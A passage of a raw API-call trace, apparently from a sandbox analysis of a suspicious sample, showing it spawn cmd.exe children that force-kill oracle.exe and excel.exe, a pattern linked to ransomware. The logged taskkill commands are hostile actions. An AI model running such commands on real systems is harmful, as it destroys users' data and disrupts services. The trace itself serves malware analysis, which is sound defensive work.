_MaxCount=0x7) returned -13 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.748] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.748] GetProcessHeap () returned 0x400000 [0060.748] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x413488 | out: hHeap=0x400000) returned 1 [0060.748] GetProcessHeap () returned 0x400000 [0060.748] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xa) returned 0x40ff18 [0060.748] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0060.749] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im oracle.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1ff070*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im oracle.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ff0bc | out: lpCommandLine="taskkill /f /im oracle.exe", lpProcessInformation=0x1ff0bc*(hProcess=0x78, hThread=0x74, dwProcessId=0x64, dwThreadId=0x55c)) returned 1 [0060.974] CloseHandle (hObject=0x74) returned 1 [0060.974] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0060.974] GetProcessHeap () returned 0x400000 [0060.974] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x415f08 | out: hHeap=0x400000) returned 1 [0060.974] GetEnvironmentStringsW () returned 0x415f08* [0060.974] GetProcessHeap () returned 0x400000 [0060.974] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xb36) returned 0x4140c8 [0060.974] FreeEnvironmentStringsW (penv=0x415f08) returned 1 [0060.974] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0068.081] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1fefb0 | out: lpExitCode=0x1fefb0*=0x80) returned 1 [0068.081] CloseHandle (hObject=0x78) returned 1 [0068.081] _vsnwprintf (in: _Buffer=0x1ff0f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1fefbc | out: _Buffer="00000080") returned 8 [0068.081] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0068.082] GetProcessHeap () returned 0x400000 [0068.082] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4140c8 | out: hHeap=0x400000) returned 1 [0068.082] GetEnvironmentStringsW () returned 0x4140c8* [0068.082] GetProcessHeap () returned 0x400000 [0068.082] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xb5c) returned 0x4195b0 [0068.082] FreeEnvironmentStringsW (penv=0x4140c8) returned 1 [0068.082] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0068.082] GetProcessHeap () returned 0x400000 [0068.082] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4195b0 | out: hHeap=0x400000) returned 1 [0068.082] GetEnvironmentStringsW () returned 0x4140c8* [0068.082] GetProcessHeap () returned 0x400000 [0068.082] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xb5c) returned 0x4195b0 [0068.082] FreeEnvironmentStringsW (penv=0x4140c8) returned 1 [0068.082] GetProcessHeap () returned 0x400000 [0068.082] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x40ff18 | out: hHeap=0x400000) returned 1 [0068.082] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ff014 | out: lpAttributeList=0x1ff014) [0068.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.082] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.082] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0068.083] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.083] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0068.083] SetConsoleInputExeNameW () returned 0x1 [0068.083] GetConsoleOutputCP () returned 0x1b5 [0068.083] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0068.083] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.083] exit (_Code=128) Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1ca4f000" os_pid = "0xba8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im excel.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0xbac [0060.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfacc | out: lpSystemTimeAsFileTime=0x2cfacc*(dwLowDateTime=0x93ed7530, dwHighDateTime=0x1d57b18)) [0060.380] GetCurrentProcessId () returned 0xba8 [0060.381] GetCurrentThreadId () returned 0xbac [0060.381] GetTickCount () returned 0x11498f6 [0060.381] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfac4 | out: lpPerformanceCount=0x2cfac4*=18060209447) returned 1 [0060.381] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0060.382] __set_app_type (_Type=0x1) [0060.382] __p__fmode () returned 0x74eb31f4 [0060.382] __p__commode () returned 0x74eb31fc [0060.382] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0060.382] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0060.382] GetCurrentThreadId () returned 0xbac [0060.382] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbac) returned 0x60 [0060.382] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.382] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0060.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0060.383] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.383] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa5c | out: phkResult=0x2cfa5c*=0x0) returned 0x2 [0060.383] VirtualQuery (in: lpAddress=0x2cfa93, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.383] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0060.383] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0060.383] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.383] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0060.383] GetConsoleOutputCP () returned 0x1b5 [0060.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.383] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0060.383] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.383] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0060.384] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.384] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0060.384] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.384] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0060.384] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.384] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0060.384] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.384] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0060.384] GetEnvironmentStringsW () returned 0x502040* [0060.384] GetProcessHeap () returned 0x4f0000 [0060.385] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x502b18 [0060.385] FreeEnvironmentStringsW (penv=0x502040) returned 1 [0060.385] GetProcessHeap () returned 0x4f0000 [0060.385] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4) returned 0x500c78 [0060.385] GetEnvironmentStringsW () returned 0x502040* [0060.385] GetProcessHeap () returned 0x4f0000 [0060.385] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x5035f0 [0060.385] FreeEnvironmentStringsW (penv=0x502040) returned 1 [0060.385] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9cc | out: phkResult=0x2ce9cc*=0x68) returned 0x0 [0060.385] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x0, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0060.385] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0060.385] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0060.385] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x0, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0060.385] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0060.385] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0060.385] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0060.386] RegCloseKey (hKey=0x68) returned 0x0 [0060.386] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9cc | out: phkResult=0x2ce9cc*=0x68) returned 0x0 [0060.386] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0060.386] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0060.386] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0060.386] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x0, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0060.386] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x9, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0060.386] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x9, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0060.386] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x9, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0060.386] RegCloseKey (hKey=0x68) returned 0x0 [0060.386] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebac [0060.386] srand (_Seed=0x5d97ebac) [0060.386] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im excel.exe" [0060.386] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im excel.exe" [0060.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.387] GetProcessHeap () returned 0x4f0000 [0060.387] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x502040 [0060.387] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x502048, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0060.387] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.387] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.387] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.387] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0060.387] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0060.387] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0060.387] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0060.387] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0060.387] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0060.387] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0060.387] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0060.387] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0060.387] GetProcessHeap () returned 0x4f0000 [0060.387] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x502b18 | out: hHeap=0x4f0000) returned 1 [0060.387] GetEnvironmentStringsW () returned 0x502258* [0060.387] GetProcessHeap () returned 0x4f0000 [0060.387] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xae2) returned 0x504bb8 [0060.387] FreeEnvironmentStringsW (penv=0x502258) returned 1 [0060.387] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0060.387] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.387] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0060.387] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0060.387] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0060.388] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0060.388] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0060.388] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0060.388] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0060.388] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0060.388] GetProcessHeap () returned 0x4f0000 [0060.388] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x54) returned 0x5056a8 [0060.388] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf798 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.388] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf798, lpFilePart=0x2cf794 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf794*="Desktop") returned 0x25 [0060.388] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.388] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf514 | out: lpFindFileData=0x2cf514*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x501ec0 [0060.388] FindClose (in: hFindFile=0x501ec0 | out: hFindFile=0x501ec0) returned 1 [0060.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf514 | out: lpFindFileData=0x2cf514*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x501ec0 [0060.388] FindClose (in: hFindFile=0x501ec0 | out: hFindFile=0x501ec0) returned 1 [0060.388] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0060.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf514 | out: lpFindFileData=0x2cf514*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x501ec0 [0060.388] FindClose (in: hFindFile=0x501ec0 | out: hFindFile=0x501ec0) returned 1 [0060.389] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.389] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0060.389] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0060.389] GetProcessHeap () returned 0x4f0000 [0060.389] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504bb8 | out: hHeap=0x4f0000) returned 1 [0060.389] GetEnvironmentStringsW () returned 0x5040c8* [0060.389] GetProcessHeap () returned 0x4f0000 [0060.389] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb36) returned 0x505f08 [0060.389] FreeEnvironmentStringsW (penv=0x5040c8) returned 1 [0060.389] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.389] GetProcessHeap () returned 0x4f0000 [0060.389] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5056a8 | out: hHeap=0x4f0000) returned 1 [0060.389] GetProcessHeap () returned 0x4f0000 [0060.389] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400e) returned 0x506a48 [0060.389] GetProcessHeap () returned 0x4f0000 [0060.389] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x40) returned 0x501ec0 [0060.389] GetProcessHeap () returned 0x4f0000 [0060.390] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a48 | out: hHeap=0x4f0000) returned 1 [0060.390] GetConsoleOutputCP () returned 0x1b5 [0060.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.685] GetUserDefaultLCID () returned 0x409 [0060.685] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0060.685] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf8d8, cchData=128 | out: lpLCData="0") returned 2 [0060.685] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf8d8, cchData=128 | out: lpLCData="0") returned 2 [0060.685] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf8d8, cchData=128 | out: lpLCData="1") returned 2 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0060.686] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0060.686] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0060.687] GetProcessHeap () returned 0x4f0000 [0060.687] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20c) returned 0x502dd0 [0060.687] GetConsoleTitleW (in: 